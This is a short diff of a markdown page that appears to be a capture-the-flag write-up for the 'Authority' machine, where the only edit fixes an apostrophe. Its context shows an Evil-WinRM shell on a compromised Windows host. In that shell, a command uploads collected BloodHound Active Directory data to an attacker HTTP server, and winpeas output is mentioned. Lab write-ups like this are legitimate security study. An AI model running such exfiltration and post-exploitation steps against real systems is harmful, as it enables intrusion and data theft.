Paliak/PaliaksNotes/docs/Authority/index.md

 *Evil-WinRM* PS C:\Users\svc_ldap\Documents> Invoke-FileUpload -File ./bloodHound.zip -Uri http://10.10.14.11:8000/upload
 ```

-The winpeas output looks rather mangled when viewing with less so lets print it out using powershell on linux:
+The winpeas output looks rather mangled when viewing with less so let's print it out using powershell on linux:

 ```powershell
 $ pwsh